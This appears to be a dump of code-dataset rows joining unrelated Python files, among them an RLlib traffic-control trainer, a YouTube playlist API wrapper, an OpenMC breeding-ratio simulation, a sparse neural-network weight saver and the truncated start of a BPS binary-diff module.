# checkpoint = trainer.save()
# print(f'checkpoint saved at {checkpoint}')
def create_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--config', type=str, default='config/global_config.json', help='config file')
parser.add_argument('--algo', type=str, default='DQN',
choices=['DQN', 'PPO', 'APEX', 'APPO', 'IMPALA', 'A3C', 'A2C'])
    parser.add_argument('--inference', action="store_true", help='run inference instead of training')
    parser.add_argument('--ckpt', type=str, help='checkpoint to restore for inference')
parser.add_argument('--epoch', type=int, default=10, help='number of training epochs')
parser.add_argument('--num_step', type=int, default=10 ** 3,
help='number of time steps for one episode, and for inference')
parser.add_argument('--save_freq', type=int, default=100, help='model saving frequency')
    parser.add_argument('--batch_size', type=int, default=128, help='training batch size')
parser.add_argument('--state_time_span', type=int, default=5, help='state interval to receive long term state')
parser.add_argument('--time_span', type=int, default=30, help='time interval to collect data')
return parser
ray.init()
parser = create_parser()
args = parser.parse_args()
env_config = gen_env_config()
trainer_config = gen_trainer_config(env_config)
# register_env('cityflow_single_agent',
# lambda config_: CityflowGymEnv(config_))
tune.run(
args.algo,
checkpoint_freq=args.save_freq,
checkpoint_at_end=True,
stop={'training_iteration': args.epoch},
config=trainer_config,
)
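# --- Usage sketch (hypothetical invocation; not part of the original script) ---
# A short smoke-test run with the bundled defaults might look like:
#   python train.py --algo APEX --epoch 5 --batch_size 64
# Ray Tune writes progress and checkpoints under ~/ray_results/<trial>/,
# checkpointing every --save_freq iterations and once more at the end.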
| import os
import argparse
import json
import logging
from datetime import datetime
import ray
import ray.rllib.agents.a3c as a3c
import ray.rllib.agents.dqn as dqn
import ray.rllib.agents.impala as impala
import ray.rllib.agents.ppo as ppo
from gym_cityflow.envs.cityflow_env import CityflowGymEnv
from ray import tune
from ray.rllib.agents.registry import get_agent_class
from ray.tune import grid_search, register_env
from utility import parse_roadnet
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
def gen_env_config():
# preparing config
# for environment
with open(args.config) as f:
config = json.load(f)
with open(config['cityflow_config_file']) as f:
cityflow_config = json.load(f)
roadnet_file = cityflow_config['dir'] + cityflow_config['roadnetFile']
config["num_step"] = args.num_step
config["state_time_span"] = args.state_time_span
config["time_span"] = args.time_span
config["lane_phase_info"] = parse_roadnet(roadnet_file)
intersection_id = list(config['lane_phase_info'].keys())[0]
# intersection_id = list(config['lane_phase_info'].keys())
config["intersection_id"] = intersection_id
phase_list = config['lane_phase_info'][intersection_id]['phase']
# logging.info(phase_list)
config["state_size"] = len(config['lane_phase_info'][intersection_id]['start_lane'])
config["action_size"] = len(phase_list)
config["batch_size"] = args.batch_size
return config
def gen_trainer_config(env_config):
# if args.algo == 'DQN':
# config = dqn.DEFAULT_CONFIG.copy()
# elif args.algo == 'PPO':
# config = ppo.DEFAULT_CONFIG.copy()
# elif args.algo == 'APEX':
# config = dqn.apex.APEX_DEFAULT_CONFIG.copy()
# elif args.algo == 'APPO':
# config = ppo.appo.DEFAULT_CONFIG.copy()
# elif args.algo == 'IMPALA':
# config = impala.DEFAULT_CONFIG.copy()
# elif args.algo == 'A3C':
# config = a3c.DEFAULT_CONFIG.copy()
# elif args.algo == 'A2C':
# config = a3c.a2c.A2C_DEFAULT_CONFIG.copy()
# else:
# assert 0 == 1, 'Unexpected args.algo.'
config = {"ignore_worker_failures": True,
"env": CityflowGymEnv, "env_config": env_config,
"num_gpus": 0, "num_workers": 24,
"num_cpus_per_worker": 1, # "num_gpus_per_worker": 0.03125,
"num_cpus_for_driver": 1}
# config['lr'] = grid_search([1e-2, 1e-3, 1e-4])
return config
def training_workflow(config_, reporter):
# build trainer
cls = get_agent_class(args.algo)
trainer = cls(env=CityflowGymEnv, config=config_)
for i in range(args.epoch):
res = trainer.train()
reporter(**res)
# if i % 100 == 0:
# checkpoint = trainer.save()
# print(f'checkpoint saved at {checkpoint}')
def create_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--config', type=str, default='config/global_config.json', help='config file')
parser.add_argument('--algo', type=str, default='DQN',
choices=['DQN', 'PPO', 'APEX', 'APPO', 'IMPALA', 'A3C', 'A2C'])
    parser.add_argument('--inference', action="store_true", help='run inference instead of training')
    parser.add_argument('--ckpt', type=str, help='checkpoint to restore for inference')
parser.add_argument('--epoch', type=int, default=10, help='number of training epochs')
parser.add_argument('--num_step', type=int, default=10 ** 3,
help='number of time steps for one episode, and for inference')
parser.add_argument('--save_freq', type=int, default=100, help='model saving frequency')
    parser.add_argument('--batch_size', type=int, default=128, help='training batch size')
parser.add_argument('--state_time_span', type=int, default=5, help='state interval to receive long term state')
parser.add_argument('--time_span', type=int, default=30, help='time interval to collect data')
return parser
ray.init()
parser = create_parser()
args = parser.parse_args()
env_config = gen_env_config()
trainer_config = gen_trainer_config(env_config)
# register_env('cityflow_single_agent',
# lambda config_: CityflowGymEnv(config_))
tune.run(
args.algo,
checkpoint_freq=args.save_freq,
checkpoint_at_end=True,
stop={'training_iteration': args.epoch},
config=trainer_config,
) | en | 0.343641 | # preparing config # for environment # intersection_id = list(config['lane_phase_info'].keys()) # logging.info(phase_list) # if args.algo == 'DQN': # config = dqn.DEFAULT_CONFIG.copy() # elif args.algo == 'PPO': # config = ppo.DEFAULT_CONFIG.copy() # elif args.algo == 'APEX': # config = dqn.apex.APEX_DEFAULT_CONFIG.copy() # elif args.algo == 'APPO': # config = ppo.appo.DEFAULT_CONFIG.copy() # elif args.algo == 'IMPALA': # config = impala.DEFAULT_CONFIG.copy() # elif args.algo == 'A3C': # config = a3c.DEFAULT_CONFIG.copy() # elif args.algo == 'A2C': # config = a3c.a2c.A2C_DEFAULT_CONFIG.copy() # else: # assert 0 == 1, 'Unexpected args.algo.' # "num_gpus_per_worker": 0.03125, # config['lr'] = grid_search([1e-2, 1e-3, 1e-4]) # build trainer # if i % 100 == 0: # checkpoint = trainer.save() # print(f'checkpoint saved at {checkpoint}') # register_env('cityflow_single_agent', # lambda config_: CityflowGymEnv(config_)) | 1.883738 | 2 |
qualitube/playlist_items.py | ericbrasiln/qualitube | 1 | 6616687 | <reponame>ericbrasiln/qualitube
import requests
import json
import pandas as pd
from configparser import ConfigParser
from .log import logger
from .exceptions import QualitubeException
config = ConfigParser()
config.read("config.ini")
API_KEY = config['credentials']['api_key']
class PlaylistItems:
"""
Wrapper class to the YouTube Data API v3's `PlaylistItems` endpoint
with extra functionality.
"""
def __init__(self, playlist_id, api_key=API_KEY):
self.playlist_id = playlist_id
self.api_key = api_key
def _try_parse(self, item, key):
try:
parsed = item[key]
except KeyError:
            logger.warning(
f"YouTube Data API v3 does not provide the `{key}` parameter fo"
f"r the requested playlist item. Setting it as `None`"
)
parsed = None
return parsed
def _parse_response(self, data):
"""Parses the API 'PlaylistItems: list' endpoint's JSON
response for the retrieval of video metadata."""
raw = json.loads(data)
try:
items = raw["items"]
except KeyError:
if "error" in raw.keys():
raise QualitubeException(
f"\nAre you sure you set qualitube's config.ini file correctly?"
f"\nYou are getting the following error from YouTube's API response:"
f"\n\t{raw}"
)
raise
parsed = []
for item in items:
parsed.append({
'id': self._try_parse(item['contentDetails'], 'videoId'),
'title': self._try_parse(item['snippet'], 'title'),
'description': self._try_parse(item['snippet'], 'description'),
'published_at': self._try_parse(item['snippet'], 'publishedAt')
})
logger.info(f"Got PlaylistItem -> id: {item['id']} / title: {item['snippet']['title']}")
try:
next_page_token = raw["nextPageToken"]
except KeyError:
next_page_token = False
return parsed, next_page_token
def get_playlist_items_data(self, page_token=None):
"""Uses the YouTube Data API v3 'PlaylistItems: list' endpoint
to get all videos from PlaylistItems (a youtube playlist)."""
headers = {
'Accept': 'application/json'
}
params = [
('part', ['contentDetails', 'snippet']),
('playlistId', self.playlist_id),
('key', self.api_key),
('maxResults', 50)
]
if page_token:
params.append(('pageToken', page_token))
r = requests.get(
'https://youtube.googleapis.com/youtube/v3/playlistItems',
headers=headers,
params=params
)
videos_data, next_page_token = self._parse_response(r.text)
if next_page_token:
return videos_data + self.get_playlist_items_data(page_token=next_page_token)
return videos_data
def to_df(self):
data = self.get_playlist_items_data()
df = pd.DataFrame(data)
return df
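# --- Usage sketch (hypothetical; the playlist id below is made up) ---
# Assumes a config.ini with a [credentials] section supplying api_key.
# fetcher = PlaylistItems('PLxxxxxxxxxxxxxxxx')
# df = fetcher.to_df()  # one row per video: id, title, description, published_at
# df.to_csv('playlist.csv', index=False)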
| import requests
import json
import pandas as pd
from configparser import ConfigParser
from .log import logger
from .exceptions import QualitubeException
config = ConfigParser()
config.read("config.ini")
API_KEY = config['credentials']['api_key']
class PlaylistItems:
"""
Wrapper class to the YouTube Data API v3's `PlaylistItems` endpoint
with extra functionality.
"""
def __init__(self, playlist_id, api_key=API_KEY):
self.playlist_id = playlist_id
self.api_key = api_key
def _try_parse(self, item, key):
try:
parsed = item[key]
except KeyError:
            logger.warning(
f"YouTube Data API v3 does not provide the `{key}` parameter fo"
f"r the requested playlist item. Setting it as `None`"
)
parsed = None
return parsed
def _parse_response(self, data):
"""Parses the API 'PlaylistItems: list' endpoint's JSON
response for the retrieval of video metadata."""
raw = json.loads(data)
try:
items = raw["items"]
except KeyError:
if "error" in raw.keys():
raise QualitubeException(
f"\nAre you sure you set qualitube's config.ini file correctly?"
f"\nYou are getting the following error from YouTube's API response:"
f"\n\t{raw}"
)
raise
parsed = []
for item in items:
parsed.append({
'id': self._try_parse(item['contentDetails'], 'videoId'),
'title': self._try_parse(item['snippet'], 'title'),
'description': self._try_parse(item['snippet'], 'description'),
'published_at': self._try_parse(item['snippet'], 'publishedAt')
})
logger.info(f"Got PlaylistItem -> id: {item['id']} / title: {item['snippet']['title']}")
try:
next_page_token = raw["nextPageToken"]
except KeyError:
next_page_token = False
return parsed, next_page_token
def get_playlist_items_data(self, page_token=None):
"""Uses the YouTube Data API v3 'PlaylistItems: list' endpoint
to get all videos from PlaylistItems (a youtube playlist)."""
headers = {
'Accept': 'application/json'
}
params = [
('part', ['contentDetails', 'snippet']),
('playlistId', self.playlist_id),
('key', self.api_key),
('maxResults', 50)
]
if page_token:
params.append(('pageToken', page_token))
r = requests.get(
'https://youtube.googleapis.com/youtube/v3/playlistItems',
headers=headers,
params=params
)
videos_data, next_page_token = self._parse_response(r.text)
if next_page_token:
return videos_data + self.get_playlist_items_data(page_token=next_page_token)
return videos_data
def to_df(self):
data = self.get_playlist_items_data()
df = pd.DataFrame(data)
return df | en | 0.629495 | Wrapper class to the YouTube Data API v3's `PlaylistItems` endpoint with extra functionality. Parses the API 'PlaylistItems: list' endpoint's JSON response for the retrieval of video metadata. Uses the YouTube Data API v3 'PlaylistItems: list' endpoint to get all videos from PlaylistItems (a youtube playlist). | 2.842618 | 3 |
core/templatetags/int_to_range.py | uktrade/great-cms | 10 | 6616688 | from django import template
register = template.Library()
@register.filter(name='int_to_range')
def int_to_range(number):
return range(number)
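# Template usage sketch (hypothetical variable name):
#   {% load int_to_range %}
#   {% for i in item_count|int_to_range %}<li>{{ i }}</li>{% endfor %}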
| from django import template
register = template.Library()
@register.filter(name='int_to_range')
def int_to_range(number):
return range(number)
| none | 1 | 1.875782 | 2 | |
vmraid/www/about.py | sowrisurya/vmraid | 0 | 6616689 | <gh_stars>0
# Copyright (c) 2015, VMRaid Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import vmraid
sitemap = 1
def get_context(context):
context.doc = vmraid.get_doc("About Us Settings", "About Us Settings")
return context
| # Copyright (c) 2015, VMRaid Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import vmraid
sitemap = 1
def get_context(context):
context.doc = vmraid.get_doc("About Us Settings", "About Us Settings")
return context | en | 0.691226 | # Copyright (c) 2015, VMRaid Technologies Pvt. Ltd. and Contributors # MIT License. See license.txt | 1.626774 | 2 |
SQLServerControlInterface/main.py | GuilhermeAnselmi/SQLServerControlInterface | 0 | 6616690 | <filename>SQLServerControlInterface/main.py
from View.ssci import *
from globalStyle import *
import os
theme = Theme()
class Main:
# Check if the file exists
if not os.path.isfile("config.json"):
Config().CreateDefaults()
interface = Tk()
SSCI(interface, theme=theme)
interface.title("SQL Server Control Interface for Unix")
#interface.geometry("300x250+250+250")
interface.attributes("-zoomed", True)
interface.configure(bg=theme.background)
interface.mainloop()
| <filename>SQLServerControlInterface/main.py
from View.ssci import *
from globalStyle import *
import os
theme = Theme()
class Main:
# Check if the file exists
if not os.path.isfile("config.json"):
Config().CreateDefaults()
interface = Tk()
SSCI(interface, theme=theme)
interface.title("SQL Server Control Interface for Unix")
#interface.geometry("300x250+250+250")
interface.attributes("-zoomed", True)
interface.configure(bg=theme.background)
interface.mainloop()
| en | 0.167128 | # Check if the file exists #interface.geometry("300x250+250+250") | 2.039768 | 2 |
minimal_openmc_dagmc_simulations/minimal.py | Shimwell/-example-git-actions-docker-openmc-dagmc | 0 | 6616691 | <filename>minimal_openmc_dagmc_simulations/minimal.py
"""
Example which simulates a simple DAGMC neutronics model using OpenMC
"""
import os
import openmc
class MinimalSimulation:
"""This is a minimal class that has a few tiny methods to demonstrate testing
"""
def __init__(self):
pass
def simulate(self):
"""this runs a simple tbr simulation using openmc and returns the
tritium breeding ratio"""
universe = openmc.Universe()
geom = openmc.Geometry(universe)
breeder_material = openmc.Material(name="blanket_material") # Pb84.2Li15.8
breeder_material.add_element('Pb', 84.2, percent_type='ao')
breeder_material.add_element('Li', 15.8, percent_type='ao', enrichment=50.0, enrichment_target='Li6', enrichment_type='ao') # 50% enriched
        breeder_material.set_density('atom/b-cm', 3.2720171e-2)  # roughly 9.5 g/cm3 equivalent
        magnet_material = openmc.Material(name="pf_coil_material")  # copper PF coil conductor
magnet_material.add_element('Cu', 1, percent_type='ao')
        magnet_material.set_density('g/cm3', 8.96)  # copper, around 8.96 g/cm3
mats = openmc.Materials([breeder_material, magnet_material])
settings = openmc.Settings()
settings.batches = 100
settings.inactive = 0
settings.particles = 100
settings.run_mode = "fixed source"
settings.dagmc = True
source = openmc.Source()
source.space = openmc.stats.Point((0, 0, 0))
source.angle = openmc.stats.Isotropic()
source.energy = openmc.stats.Discrete([14e6], [1])
settings.source = source
tallies = openmc.Tallies()
tbr_tally = openmc.Tally(name="TBR")
tbr_tally.scores = ["(n,Xt)"] # where X is a wild card
tallies.append(tbr_tally)
model = openmc.model.Model(geom, mats, settings, tallies)
output_filename = model.run()
# open the results file
sp = openmc.StatePoint(output_filename)
# access the tally using pandas dataframes
tbr_tally = sp.get_tally(name='TBR')
df = tbr_tally.get_pandas_dataframe()
tbr_tally_result = df['mean'].sum()
return tbr_tally_result
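# --- Usage sketch (hypothetical) ---
# Running this needs a DAGMC geometry file (dagmc.h5m) in the working
# directory and nuclear data pointed to by OPENMC_CROSS_SECTIONS.
# sim = MinimalSimulation()
# print('TBR =', sim.simulate())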
| <filename>minimal_openmc_dagmc_simulations/minimal.py
"""
Example which simulates a simple DAGMC neutronics model using OpenMC
"""
import os
import openmc
class MinimalSimulation:
"""This is a minimal class that has a few tiny methods to demonstrate testing
"""
def __init__(self):
pass
def simulate(self):
"""this runs a simple tbr simulation using openmc and returns the
tritium breeding ratio"""
universe = openmc.Universe()
geom = openmc.Geometry(universe)
breeder_material = openmc.Material(name="blanket_material") # Pb84.2Li15.8
breeder_material.add_element('Pb', 84.2, percent_type='ao')
breeder_material.add_element('Li', 15.8, percent_type='ao', enrichment=50.0, enrichment_target='Li6', enrichment_type='ao') # 50% enriched
        breeder_material.set_density('atom/b-cm', 3.2720171e-2)  # roughly 9.5 g/cm3 equivalent
        magnet_material = openmc.Material(name="pf_coil_material")  # copper PF coil conductor
magnet_material.add_element('Cu', 1, percent_type='ao')
        magnet_material.set_density('g/cm3', 8.96)  # copper, around 8.96 g/cm3
mats = openmc.Materials([breeder_material, magnet_material])
settings = openmc.Settings()
settings.batches = 100
settings.inactive = 0
settings.particles = 100
settings.run_mode = "fixed source"
settings.dagmc = True
source = openmc.Source()
source.space = openmc.stats.Point((0, 0, 0))
source.angle = openmc.stats.Isotropic()
source.energy = openmc.stats.Discrete([14e6], [1])
settings.source = source
tallies = openmc.Tallies()
tbr_tally = openmc.Tally(name="TBR")
tbr_tally.scores = ["(n,Xt)"] # where X is a wild card
tallies.append(tbr_tally)
model = openmc.model.Model(geom, mats, settings, tallies)
output_filename = model.run()
# open the results file
sp = openmc.StatePoint(output_filename)
# access the tally using pandas dataframes
tbr_tally = sp.get_tally(name='TBR')
df = tbr_tally.get_pandas_dataframe()
tbr_tally_result = df['mean'].sum()
return tbr_tally_result
| en | 0.832637 | Example which simulates a simple DAGMC neutronics model using OpenMC This is a minimal class that has a few tiny methods to demonstrate testing this runs a simple tbr simulation using openmc and returns the tritium breeding ratio # Pb84.2Li15.8 # 50% enriched # around 11 g/cm3 # Pb84.2Li15.8 # around 11 g/cm3 # where X is a wild card # open the results file # access the tally using pandas dataframes | 2.628687 | 3 |
sparana/saver.py | jngannon/SpaRaNa | 0 | 6616692 | import numpy as np
import cupy as cp
import pickle
from cupy.sparse import coo_matrix
from cupy.sparse import csr_matrix
class model_saver:
def __init__(self, model):
self._model = model
if self._model._layer_type == 'Sparse':
if self._model._comp_type == 'GPU':
self._model_arrays = [(i._weights.get(), i._biases.get()) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(i._weights.copy(), np.array(i._biases)) for i in self._model._layers]
if self._model._layer_type == 'Full':
if self._model._comp_type == 'GPU':
self._model_arrays = [(i._weights.get(), i._biases.get()) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(np.array(i._weights), np.array(i._biases)) for i in self._model._layers]
self._sparse_parameters = None
def store_model(self):
''' Stores the current state of the model. '''
if self._model._layer_type == 'Sparse':
            if self._model._comp_type == 'GPU':
                self._model_arrays = [(i._weights.get(), i._biases.get()) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(i._weights.copy(), np.array(i._biases)) for i in self._model._layers]
if self._model._layer_type == 'Full':
if self._model._comp_type == 'GPU':
self._model_arrays = [(i._weights.get(), i._biases.get()) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(np.array(i._weights), np.array(i._biases)) for i in self._model._layers]
return
def restore_model(self):
''' Restores the weights stored in the model saver. '''
if self._model._layer_type == 'Sparse':
if self._model._comp_type == 'CPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = self._model_arrays[i][0].copy()
self._model._layers[i]._biases = np.array(self._model_arrays[i][1])
if self._model._comp_type == 'GPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = cp.sparse.csr_matrix(self._model_arrays[i][0])
self._model._layers[i]._biases = cp.array(self._model_arrays[i][1])
if self._model._layer_type == 'Full':
if self._model._comp_type == 'GPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = cp.array(self._model_arrays[i][0])
self._model._layers[i]._biases = cp.array(self._model_arrays[i][1])
if self._model._comp_type == 'CPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = np.array(self._model_arrays[i][0])
self._model._layers[i]._biases = np.array(self._model_arrays[i][1])
return
def pickle_model(self, filename):
''' Stores the model in a pickle file. '''
pickle.dump(self._model, open(filename, 'wb'))
print('Model pickled')
return
def load_model(self, filename):
''' Loads the model from a pickle file. '''
filelist = pickle.load(open(filename, 'rb'))
if self._model._layer_type == 'Sparse':
self._model_arrays = [(i[0].copy(), np.array(i[1])) for i in filelist]
if self._model._layer_type == 'Full':
for i in range(self._model._depth):
                self._model._layers[i]._weights = filelist._layers[i]._weights
                self._model._layers[i]._biases = filelist._layers[i]._biases
# Do a check that the layer type matches the weight datatype
def load_sparse_parameters(self, filename):
''' Loads sparse parameters into the loader class, and into the model.
(I can't think of a real use for loading the parameters into the loader, and model seperately)'''
parameters = pickle.load(open(filename, 'rb'))
for i in range(len(parameters)):
# Put the training masks in the layer objects, TODO turn this into a [0,1] mask
self._model._sparse_training_mask = None #parameters[i]
# Put the individual weights in the weight matrices
for j in range(parameters[i].nnz):
self._model._layers[i]._weights[parameters[i].row[j]][parameters[i].col[j]] = parameters[i].data[j]
print('Inserted weights from ', filename, ' into the weight matrices')
return
def store_sparse_parameters(self):
        ''' Collects the masked sparse parameters into memory on this saver; call pickle_sparse_parameters afterwards to persist them. '''
# What format will this give me, I need sparse matrices.
parameters = []
for i in self._model._layers:
these_parameters = np.multiply(i._weights, i._sparse_training_mask)
# Sparsify these_parameters
these_parameters = csr_matrix(these_parameters, dtype = np.float32)
these_parameters = these_parameters.tocoo()
parameters.append((these_parameters, i._biases))
self._sparse_parameters = parameters
return
def pickle_sparse_parameters(self, filename):
''' Stores the sparse parameters in a pickle file. '''
        if self._sparse_parameters is None:
            print('No parameters stored')
            return
        pickle.dump(self._sparse_parameters, open(filename, 'wb'))
        print('Sparse parameters pickled')
return
def restore_sparse_parameters(self):
        ''' Restores the stored sparse parameters, dropping the individual weights back into the model's weight matrices. '''
        if self._sparse_parameters is None:
print('No parameters stored')
return
for i in range(len(self._sparse_parameters)):
# Put the training masks in the layer objects, TODO turn this into a [0,1] mask
#self._model._sparse_training_mask = None #parameters[i]
# Put the individual weights in the weight matrices
for j in range(self._sparse_parameters[i][0].nnz):
self._model._layers[i]._weights[int(self._sparse_parameters[i][0].row[j])][int(self._sparse_parameters[i][0].col[j])] = self._sparse_parameters[i][0].data[j]
# Replace full arrays, test
#self._model._layers[i]._weights = np.multiply(self._model._layers[i]._weights, (self._sparse_parameters[i][0] == 0))
#self._model._layers[i]._weights = self._model._layers[i]._weights + self._sparse_parameters[i][0]
self._model._layers[i]._biases = self._sparse_parameters[i][1]
print('Sparse parameters restored')
return
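# --- Usage sketch (hypothetical; assumes a sparana model object) ---
# saver = model_saver(model)       # snapshot is taken at construction
# ... train or prune the model ...
# saver.restore_model()            # roll the weights back to the snapshot
# saver.pickle_model('model.pkl')  # or persist the live model to disk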
| import numpy as np
import cupy as cp
import pickle
from cupy.sparse import coo_matrix
from cupy.sparse import csr_matrix
class model_saver:
def __init__(self, model):
self._model = model
if self._model._layer_type == 'Sparse':
if self._model._comp_type == 'GPU':
self._model_arrays = [(i._weights.get(), i._biases.get()) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(i._weights.copy(), np.array(i._biases)) for i in self._model._layers]
if self._model._layer_type == 'Full':
if self._model._comp_type == 'GPU':
self._model_arrays = [(i._weights.get(), i._biases.get()) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(np.array(i._weights), np.array(i._biases)) for i in self._model._layers]
self._sparse_parameters = None
def store_model(self):
''' Stores the current state of the model. '''
if self._model._layer_type == 'Sparse':
            if self._model._comp_type == 'GPU':
                self._model_arrays = [(i._weights.get(), i._biases.get()) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(i._weights.copy(), np.array(i._biases)) for i in self._model._layers]
if self._model._layer_type == 'Full':
if self._model._comp_type == 'GPU':
self._model_arrays = [(i._weights.get(), i._biases.get()) for i in self._model._layers]
if self._model._comp_type == 'CPU':
self._model_arrays = [(np.array(i._weights), np.array(i._biases)) for i in self._model._layers]
return
def restore_model(self):
''' Restores the weights stored in the model saver. '''
if self._model._layer_type == 'Sparse':
if self._model._comp_type == 'CPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = self._model_arrays[i][0].copy()
self._model._layers[i]._biases = np.array(self._model_arrays[i][1])
if self._model._comp_type == 'GPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = cp.sparse.csr_matrix(self._model_arrays[i][0])
self._model._layers[i]._biases = cp.array(self._model_arrays[i][1])
if self._model._layer_type == 'Full':
if self._model._comp_type == 'GPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = cp.array(self._model_arrays[i][0])
self._model._layers[i]._biases = cp.array(self._model_arrays[i][1])
if self._model._comp_type == 'CPU':
for i in range(self._model._depth):
self._model._layers[i]._weights = np.array(self._model_arrays[i][0])
self._model._layers[i]._biases = np.array(self._model_arrays[i][1])
return
def pickle_model(self, filename):
''' Stores the model in a pickle file. '''
pickle.dump(self._model, open(filename, 'wb'))
print('Model pickled')
return
def load_model(self, filename):
''' Loads the model from a pickle file. '''
filelist = pickle.load(open(filename, 'rb'))
if self._model._layer_type == 'Sparse':
self._model_arrays = [(i[0].copy(), np.array(i[1])) for i in filelist]
if self._model._layer_type == 'Full':
for i in range(self._model._depth):
                self._model._layers[i]._weights = filelist._layers[i]._weights
                self._model._layers[i]._biases = filelist._layers[i]._biases
# Do a check that the layer type matches the weight datatype
def load_sparse_parameters(self, filename):
''' Loads sparse parameters into the loader class, and into the model.
(I can't think of a real use for loading the parameters into the loader, and model seperately)'''
parameters = pickle.load(open(filename, 'rb'))
for i in range(len(parameters)):
# Put the training masks in the layer objects, TODO turn this into a [0,1] mask
self._model._sparse_training_mask = None #parameters[i]
# Put the individual weights in the weight matrices
for j in range(parameters[i].nnz):
self._model._layers[i]._weights[parameters[i].row[j]][parameters[i].col[j]] = parameters[i].data[j]
print('Inserted weights from ', filename, ' into the weight matrices')
return
def store_sparse_parameters(self):
        ''' Collects the masked sparse parameters into memory on this saver; call pickle_sparse_parameters afterwards to persist them. '''
# What format will this give me, I need sparse matrices.
parameters = []
for i in self._model._layers:
these_parameters = np.multiply(i._weights, i._sparse_training_mask)
# Sparsify these_parameters
these_parameters = csr_matrix(these_parameters, dtype = np.float32)
these_parameters = these_parameters.tocoo()
parameters.append((these_parameters, i._biases))
self._sparse_parameters = parameters
return
def pickle_sparse_parameters(self, filename):
''' Stores the sparse parameters in a pickle file. '''
        if self._sparse_parameters is None:
            print('No parameters stored')
            return
        pickle.dump(self._sparse_parameters, open(filename, 'wb'))
        print('Sparse parameters pickled')
return
def restore_sparse_parameters(self):
        ''' Restores the stored sparse parameters, dropping the individual weights back into the model's weight matrices. '''
        if self._sparse_parameters is None:
print('No parameters stored')
return
for i in range(len(self._sparse_parameters)):
# Put the training masks in the layer objects, TODO turn this into a [0,1] mask
#self._model._sparse_training_mask = None #parameters[i]
# Put the individual weights in the weight matrices
for j in range(self._sparse_parameters[i][0].nnz):
self._model._layers[i]._weights[int(self._sparse_parameters[i][0].row[j])][int(self._sparse_parameters[i][0].col[j])] = self._sparse_parameters[i][0].data[j]
# Replace full arrays, test
#self._model._layers[i]._weights = np.multiply(self._model._layers[i]._weights, (self._sparse_parameters[i][0] == 0))
#self._model._layers[i]._weights = self._model._layers[i]._weights + self._sparse_parameters[i][0]
self._model._layers[i]._biases = self._sparse_parameters[i][1]
print('Sparse parameters restored')
return
| en | 0.677307 | Stores the current state of the model. Restores the weights stored in the model saver. Stores the model in a pickle file. Loads the model from a pickle file. # Do a check that the layer type matches the weight datatype Loads sparse parameters into the loader class, and into the model. (I can't think of a real use for loading the parameters into the loader, and model seperately) # Put the training masks in the layer objects, TODO turn this into a [0,1] mask #parameters[i] # Put the individual weights in the weight matrices This returns the parameters that can be stored in memory in the notebook, use pickle_sparse_parameters after this # What format will this give me, I need sparse matrices. # Sparsify these_parameters Stores the sparse parameters in a pickle file. Need a more specific name than sparse parameters. this will take some learning, drop the weights in # Put the training masks in the layer objects, TODO turn this into a [0,1] mask #self._model._sparse_training_mask = None #parameters[i] # Put the individual weights in the weight matrices # Replace full arrays, test #self._model._layers[i]._weights = np.multiply(self._model._layers[i]._weights, (self._sparse_parameters[i][0] == 0)) #self._model._layers[i]._weights = self._model._layers[i]._weights + self._sparse_parameters[i][0] | 2.179459 | 2 |
bps/diff.py | tcprescott/python-bps | 1 | 6616693 | # This program is free software. It comes without any warranty, to
# the extent permitted by applicable law. You can redistribute it
# and/or modify it under the terms of the Do What The Fuck You Want
# To Public License, Version 2, as published by Sam Hocevar. See
# the COPYING file included with this distribution or
# http://sam.zoy.org/wtfpl/COPYING for more details.
"""
Tools for creating BPS patches.
For more information about the basic algorithm used here, see the article
"Intro to Delta Encoding":
https://gitorious.org/python-blip/pages/IntroToDeltaEncoding
"""
from zlib import crc32
from bps import operations as ops
from bps.util import BlockMap
def iter_blocks(data, blocksize):
    """
    Yield the blocksize-byte block that starts at every offset of data.

    Consecutive blocks overlap: the offset advances by one byte rather
    than by blocksize, so every possible alignment gets indexed.
    """
    offset = 0
    while offset < len(data):
        block = data[offset:offset+blocksize]
        yield (block, offset)
        offset += 1
def measure_op(blocksrc, sourceoffset, target, targetoffset):
"""
Measure the match between blocksrc and target at these offsets.
"""
# The various parameters line up something like this:
#
# v-- sourceoffset
# ...ABCDExGHI... <-- blocksrc
#
# ...xxxABCDEF... <-- target
# ^-- targetOffset
#
# result: backspan = 2, forespan = 3
#
# Measure how far back the source and target files match from these
# offsets.
backspan = 0
# We need the +1 here because the test inside the loop is actually looking
# at the byte *before* the one pointed to by (sourceoffset-backspan), so
# we need our span to stretch that little bit further.
maxspan = min(sourceoffset, targetoffset) + 1
for backspan in range(maxspan):
if blocksrc[sourceoffset-backspan-1] != target[targetoffset-backspan-1]:
break
# Measure how far forward the source and target files are aligned.
forespan = 0
sourcespan = len(blocksrc) - sourceoffset
targetspan = len(target) - targetoffset
maxspan = min(sourcespan, targetspan)
for forespan in range(maxspan):
if blocksrc[sourceoffset+forespan] != target[targetoffset+forespan]:
break
else:
# We matched right up to the end of the file.
forespan += 1
return backspan, forespan
def diff_bytearrays(blocksize, source, target, metadata=""):
"""
Yield a sequence of patch operations that transform source to target.
"""
yield ops.Header(len(source), len(target), metadata)
# We assume the entire source file will be available when applying this
# patch, so load the entire thing into the block map.
sourcemap = BlockMap()
for block, offset in iter_blocks(source, blocksize):
sourcemap.add_block(block, offset)
# Points at the next byte of the target buffer that needs to be encoded.
targetWriteOffset = 0
# Points at the next byte of the target buffer we're searching for
# encodings for. If we can't find an encoding for a particular byte, we'll
# leave targetWriteOffset alone and increment this offset, on the off
# chance that we find a new encoding that we can extend backwards to
# targetWriteOffset.
